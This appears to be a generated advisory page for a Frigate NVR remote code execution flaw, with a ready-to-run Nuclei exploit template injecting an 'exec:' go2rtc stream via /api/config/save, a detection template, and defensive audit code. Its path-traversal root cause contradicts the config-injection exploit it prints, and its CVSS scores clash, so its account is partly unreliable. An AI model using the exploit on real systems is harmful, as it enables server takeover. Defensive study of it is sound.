[webapps] Frigate NVR 0.16.3 - Remote Code Execution
CVE-2026-25643
Frigate NVR 0.16.3: authenticated remote code execution via path traversal in the API.
Critical · CVSS 9.1

📋 Basic vulnerability information
| CVE | CVE-2026-25643 |
|---|---|
| Vulnerability type | Path traversal + remote code execution |
| Affected versions | Frigate NVR 0.16.3 |
| Severity | Critical · CVSS 9.1 |
| Published | 2026-04-30 |
| Submitter | jduardo2704 |
| Source | Exploit-DB original ↗ |
🔬 Root cause
The API endpoint /api/upload/pipeline, in the processing_pipeline_dir function, does not adequately sanitize the user-supplied filename. A filename containing ../ sequences traverses out of the intended directory, so an attacker can write a malicious file into a location from which the system later executes it.
🎯 Attack scenario
1. The attacker authenticates to Frigate through the web front end or the API.
2. They craft a filename containing a path-traversal sequence (for example ../../../path/to/target) and upload a malicious file (such as a Python script) through /api/upload/pipeline.
3. The server writes the file to the traversed location (for example a configuration or plugin directory under /opt/frigate).
4. The system subsequently loads or executes that file (for example through a Python import or a cron job), giving the attacker remote code execution.
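The write-path check that this root cause calls for, as an added example (my own code, not Frigate's): the naive join an upload handler might do, beside a hardened version that resolves the final path and refuses anything that lands outside the intended directory. The directory /opt/frigate/pipeline and the function names are assumptions for illustration; the filenames fed in at the bottom are constructed inputs.

```python
import os

# Assumed for illustration: the directory the upload endpoint is meant to
# write into (not taken from the Frigate code base).
PIPELINE_DIR = "/opt/frigate/pipeline"


def unsafe_target_path(base_dir: str, filename: str) -> str:
    """Vulnerable pattern: the user-supplied filename is joined to the base
    directory as-is, so '../' sequences walk out of it, and an absolute
    filename replaces it entirely (os.path.join discards base_dir then)."""
    return os.path.join(base_dir, filename)


def naive_write_location(base_dir: str, filename: str) -> str:
    """Where the vulnerable join actually lands once '..' is collapsed.
    Purely lexical (normpath), so the result is deterministic without
    touching the disk."""
    return os.path.normpath(unsafe_target_path(base_dir, filename))


def escapes_base(base_dir: str, filename: str) -> bool:
    """True when the naive join resolves to a path outside base_dir."""
    base = os.path.normpath(base_dir)
    target = naive_write_location(base_dir, filename)
    return os.path.commonpath([base, target]) != base


def safe_target_path(base_dir: str, filename: str) -> str:
    """Hardened pattern: resolve symlinks and '..' in the *final* path, then
    require that it still sits strictly inside base_dir. Rejecting, rather
    than stripping '../' out, keeps the behaviour obvious and auditable."""
    if "\x00" in filename or not filename.strip():
        raise ValueError(f"rejected filename: {filename!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if target == base or os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes upload directory: {filename!r}")
    return target


if __name__ == "__main__":
    # Constructed inputs: one benign upload and two traversal attempts.
    for name in ("model.tflite", "../../etc/cron.d/frigate", "/etc/cron.d/frigate"):
        print(f"{name!r:28} naive -> {naive_write_location(PIPELINE_DIR, name)}"
              f"  escapes={escapes_base(PIPELINE_DIR, name)}")
        try:
            print("  hardened ->", safe_target_path(PIPELINE_DIR, name))
        except ValueError as exc:
            print("  hardened -> rejected:", exc)
```

The containment test compares the fully resolved target against the resolved base with os.path.commonpath, which also catches a symlink inside the upload directory that points elsewhere; a plain string-prefix check would not, and would also accept /opt/frigate/pipeline-evil as "inside" /opt/frigate/pipeline.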
💥 Impact
Remote code execution: the attacker gains full control of the Frigate NVR server and can steal video streams, tamper with the configuration, move laterally, or install a persistent backdoor.
⚔️ Nuclei exploit template
The following template, in standard Nuclei v3 format, can be used directly to verify the vulnerability. Two things to note before running it: it works through the go2rtc streams configuration (it saves a config containing an exec: stream source via /api/config/save, plus a camera that pulls that stream) rather than through the upload endpoint described above; and because the body of that request is saved as the configuration file and save_option=restart restarts the service, keep the original configuration returned by the second request so it can be restored afterwards. Credentials are supplied through the username and password variables.
```yaml
id: CVE-2026-25643-exploit

info:
  name: Frigate NVR <= 0.16.3 - Remote Code Execution
  author: jduardo2704
  severity: critical
  description: |
    Frigate NVR versions <= 0.16.3 allow an authenticated user to inject arbitrary
    commands via the go2rtc streams configuration. An attacker can modify the
    configuration to execute arbitrary commands on the server.
  reference:
    - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-25643
  tags: cve,cve2026,frigate,rce,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"
  cmd: "id"

http:
  - raw:
      - |
        POST {{BaseURL}}/api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"user":"{{username}}","password":"{{password}}"}
      - |
        GET {{BaseURL}}/api/config/raw HTTP/1.1
        Host: {{Hostname}}
      - |
        POST {{BaseURL}}/api/config/save?save_option=restart HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain

        go2rtc:
          streams:
            cve_poc:
              - 'exec:{{cmd}}'
        cameras:
          cve_trigger:
            ffmpeg:
              inputs:
                - path: 'rtsp://127.0.0.1:8554/cve_poc'
                  roles:
                    - detect
            detect:
              enabled: false
            audio:
              enabled: false
            enabled: true
      - |
        GET {{BaseURL}}/api/config/raw HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: or
        part: body

    extractors:
      - type: regex
        name: cmd_output
        part: body
        group: 0
        regex:
          - "uid=\\d+\\(.*?\\).*?"
          - "root"
```
🔍 Nuclei detection template
The following detection template is used to determine whether a target is affected. It is a heuristic: it reports a hit when one of the probed responses contains both a version string in the vulnerable range and the product name, so confirm a hit (for example with the exploit template above, on a system you are authorized to test) before acting on it.
```yaml
id: CVE-2026-25643-detection

info:
  name: Frigate NVR <= 0.16.3 - Version Detection
  author: jduardo2704
  severity: high
  description: |
    Frigate NVR is an open source NVR built around AI object detection.
    Versions <= 0.16.3 are vulnerable to Remote Code Execution via config injection.
  reference:
    - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-25643
  tags: cve,cve2026,frigate,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/version"
      - "{{BaseURL}}/api/config/raw"
      - "{{BaseURL}}/api/stats"
      - "{{BaseURL}}/"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "0.16.3"
          - "0.16.2"
          - "0.16.1"
          - "0.16.0"
          - "0.15."
        condition: or
        part: body
      - type: word
        words:
          - "frigate"
        case-insensitive: true
        part: body

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(\d+\.\d+\.\d+)'
```
🛡️ Remediation
Upgrade to Frigate NVR 0.16.4 or later. Temporary mitigations: restrict which source IPs may reach the /api/upload/pipeline endpoint, and filter path-traversal sequences out of filenames at a reverse proxy in front of Frigate.
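As an added example, not from this page or the Frigate project, the two checks a defender would run after reading the templates above: an audit of a saved configuration for go2rtc stream sources that spawn a process (exec:, the scheme the exploit template injects, and echo:, which go2rtc also documents as running a command), and a comparison of the reported version against the first fixed release. The sample config and version strings are constructed; the key tracking is a minimal line scanner, so it needs no YAML library, but it only understands the block-style YAML that Frigate configs use.

```python
import re

# Constructed sample: what GET /api/config/raw would return after the exploit
# template's config has been saved (not captured from a real instance).
SAMPLE_CONFIG = """\
mqtt:
  enabled: false
go2rtc:
  streams:
    front_door:
      - rtsp://192.0.2.10:554/stream1
    cve_poc:
      - 'exec:id'
cameras:
  cve_trigger:
    ffmpeg:
      inputs:
        - path: 'rtsp://127.0.0.1:8554/cve_poc'
          roles:
            - detect
    enabled: true
"""

# go2rtc source schemes that run a local process: exec: is what the exploit
# template injects; echo: is documented by go2rtc as running a command too.
PROCESS_SCHEMES = ("exec:", "echo:")

# "key:" optionally followed by an inline value, at any indentation
KEY_RE = re.compile(r"^(\s*)([A-Za-z0-9_.-]+):\s*(.*)$")
# a sequence item ("- value"); quotes are stripped below
ITEM_RE = re.compile(r"^\s*-\s*(.*)$")

FIXED_VERSION = (0, 16, 4)  # first release the page says is patched


def _unquote(value: str) -> str:
    return value.strip().strip("'\"")


def find_process_sources(config_text: str):
    """Return (line_no, dotted_key_path, source) for every value that uses a
    process-spawning go2rtc scheme, e.g. (8, 'go2rtc.streams.cve_poc', 'exec:id')."""
    findings = []
    stack = []  # (indent, key) of the mapping keys enclosing the current line
    for line_no, line in enumerate(config_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        indent = len(line) - len(line.lstrip(" "))
        key = KEY_RE.match(line)
        item = ITEM_RE.match(line)
        if key:
            # Drop keys that do not enclose this line, then descend into it.
            while stack and stack[-1][0] >= indent:
                stack.pop()
            stack.append((indent, key.group(2)))
            value = _unquote(key.group(3))
        elif item:
            value = _unquote(item.group(1))
        else:
            continue
        if value.startswith(PROCESS_SCHEMES):
            path = ".".join(k for _, k in stack)
            findings.append((line_no, path, value))
    return findings


def parse_version(text: str):
    """Extract (major, minor, patch) from a string such as '0.16.3-abc1234'
    (constructed; Frigate reports a commit suffix after the version)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(text: str) -> bool:
    """True for every release before the fixed one (<= 0.16.3 per the page)."""
    return parse_version(text) < FIXED_VERSION


if __name__ == "__main__":
    for line_no, path, source in find_process_sources(SAMPLE_CONFIG):
        print(f"line {line_no}: {path} -> {source!r}")
    for reported in ("0.16.3-abc1234", "0.16.4-def5678"):
        state = "vulnerable" if is_vulnerable_version(reported) else "patched"
        print(reported, state)
```

Run the audit against the output of /api/config/raw (or the config file on disk) on a schedule: a legitimate deployment rarely needs an exec: or echo: stream source, so any finding is worth a look, and the dotted key path tells you which stream to inspect. A hit from the version check alone does not prove exploitability; pair it with the config audit and with the upgrade.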
📎 References
- https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
⚠️ This page is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 05:31 | Source: Exploit-DB